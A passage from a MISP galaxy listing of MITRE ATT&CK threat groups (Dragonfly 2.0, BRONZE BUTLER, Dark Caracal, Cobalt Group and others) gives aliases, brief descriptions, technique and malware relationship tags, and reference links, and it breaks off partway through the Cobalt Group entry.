uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Library - T1560.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ASPXSpy - S0073" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Windows Credential Editor - S0005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="HTTPBrowser - S0070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="China Chopper - S0020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="gsecdump - S0008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="pwdump - S0006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="HyperBro - S0398" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Impacket - S0357" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="gh0st RAT - S0032" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ZxShell - S0412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="NBTscan - S0590" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Target - T1608.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Upload Tool - T1608.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4451. Table References
Links
https://attack.mitre.org/groups/G0027
https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage
https://www.secureworks.com/research/bronze-union
https://securelist.com/luckymouse-hits-national-data-center/86083/
https://thehackernews.com/2018/06/chinese-watering-hole-attack.html
https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/
http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/
https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/

Threat Group-1314 - G0028

[Threat Group-1314](https://attack.mitre.org/groups/G0028) is an unattributed threat group that has used compromised credentials to log into a victim’s remote access infrastructure. (Citation: Dell TG-1314)

The tag is: misp-galaxy:mitre-intrusion-set="Threat Group-1314 - G0028"

Threat Group-1314 - G0028 is also known as:

Threat Group-1314
TG-1314

View relationships graph

Threat Group-1314 - G0028 has relationships with:

uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"

Table 4452. Table References
Links
https://attack.mitre.org/groups/G0028
http://www.secureworks.com/resources/blog/living-off-the-land/

Dragonfly 2.0 - G0074

[Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least December 2015. (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) There is debate over the extent of overlap between [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/groups/G0035), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )

The tag is: misp-galaxy:mitre-intrusion-set="Dragonfly 2.0 - G0074"

Dragonfly 2.0 - G0074 is also known as:

Dragonfly 2.0
IRON LIBERTY
DYMALLOY
Berserk Bear

View relationships graph

Dragonfly 2.0 - G0074 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Impacket - S0357" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Forced Authentication - T1187" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="netsh - S0108" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Reg - S0075" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="CrackMapExec - S0488" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Trojan.Karagany - S0094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="MCMD - S0500" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Users - T1564.002" with estimative-language:likelihood-probability="almost-certain"

Table 4453. Table References
Links
https://attack.mitre.org/groups/G0074
https://www.us-cert.gov/ncas/alerts/TA18-074A
https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group
http://fortune.com/2017/09/06/hack-energy-grid-symantec/
https://www.dragos.com/threat/dymalloy/
https://www.secureworks.com/research/mcmd-malware-analysis
https://www.secureworks.com/research/threat-profiles/iron-liberty

Lotus Blossom - G0030

[Lotus Blossom](https://attack.mitre.org/groups/G0030) is a threat group that has targeted government and military organizations in Southeast Asia. (Citation: Lotus Blossom Jun 2015)

The tag is: misp-galaxy:mitre-intrusion-set="Lotus Blossom - G0030"

Lotus Blossom - G0030 is also known as:

Lotus Blossom
DRAGONFISH
Spring Dragon

View relationships graph

Lotus Blossom - G0030 has relationships with:

similar: misp-galaxy:threat-actor="Lotus Blossom" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="Elise - S0081" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Emissary - S0082" with estimative-language:likelihood-probability="almost-certain"

Table 4454. Table References
Links
https://attack.mitre.org/groups/G0030
https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html
https://www.accenture.com/t20180127T003755Z_w_/us-en/acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf[https://www.accenture.com/t20180127T003755Z_w/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf]
https://securelist.com/the-spring-dragon-apt/70726/

BRONZE BUTLER - G0060

[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)

The tag is: misp-galaxy:mitre-intrusion-set="BRONZE BUTLER - G0060"

BRONZE BUTLER - G0060 is also known as:

BRONZE BUTLER
REDBALDKNIGHT
Tick

View relationships graph

BRONZE BUTLER - G0060 has relationships with:

similar: misp-galaxy:threat-actor="Tick" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="cmd - S0106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Daserf - S0187" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Windows Credential Editor - S0005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="gsecdump - S0008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="at - S0110" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="schtasks - S0111" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Right-to-Left Override - T1036.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ABK - S0469" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="down_new - S0472" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="build_downer - S0471" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="BBK - S0470" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Avenger - S0473" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ShadowPad - S0596" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4455. Table References
Links
https://attack.mitre.org/groups/G0060
http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/
https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses
https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf
https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan

Dark Caracal - G0070

[Dark Caracal](https://attack.mitre.org/groups/G0070) is threat group that has been attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012. (Citation: Lookout Dark Caracal Jan 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Dark Caracal - G0070"

Dark Caracal - G0070 is also known as:

Dark Caracal

View relationships graph

Dark Caracal - G0070 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="FinFisher - S0182" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Bandook - S0234" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="CrossRAT - S0235" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Pallas - S0399" with estimative-language:likelihood-probability="almost-certain"

Table 4456. Table References
Links
https://attack.mitre.org/groups/G0070
https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf

Cobalt Group - G0080

[Cobalt Group](https://attack.mitre.org/groups/G0080) is a financially motivated threat group that has primarily targeted financial institutions since at least 2016. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. [Cobalt Group](https://attack.mitre.org/groups/G0080) has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)(Citation: Proofpoint Cobalt June 2017)(Citation: RiskIQ Cobalt Nov 2017)(Citation: RiskIQ Cobalt Jan 2018) Reporting indicates there may be links between [Cobalt Group](https://attack.mitre.org/groups/G0080) and both the malware [Carbanak](https://attack.mitre.org/software/S0030) and the group [Carbanak](https://attack.mitre.org/groups/G0008).(Citation: Europol Cobalt Mar 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Cobalt Group - G0080"

Cobalt Group - G0080 is also known as:

Cobalt Group
GOLD KINGSWOOD
Cobalt Gang
Cobalt Spider

View relationships graph

Cobalt Group - G0080 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="More_eggs - S0284" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="SDelete - S0195" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
